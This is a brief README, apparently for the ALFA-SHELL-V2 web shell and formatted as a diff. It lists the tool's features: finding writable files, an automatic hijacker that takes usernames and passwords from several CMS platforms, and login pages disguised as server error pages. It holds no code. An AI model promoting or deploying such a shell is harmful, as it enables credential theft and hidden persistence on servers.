hiitsjb1/ALFA-SHELL-V2/README.txt

 File Searcher [Find All Writable Files][Find All Writable Dirs][Find All Readable And Writable Files] String Searcher ~ [ For Search in Files ]
-Auto CMS Hijacker [vBulletin][WordPress][Joomla][WHMCS][MYBB][IPBOARD][PHPBB] ~ For Hijack Username And Password Users ALFA Settings ~ [ For Special Configuration You like Protect From Shell With UserName And Password And Login page with (GUI interface - 500 internal Server Error -  403 Forbidden - 404 Not Found) ]
+Auto CMS Hijacker [vBulletin][WordPress][Joomla][WHMCS][MYBB][IPBOARD][PHPBB] ~ For Hijack Username And Password Users Alfa News ~ [ For view the latest news about the program ] ALFA Settings ~ [ For Special Configuration You like Protect From Shell With UserName And Password And Login page with (GUI interface - 500 internal Server Error -  403 Forbidden - 404 Not Found) ]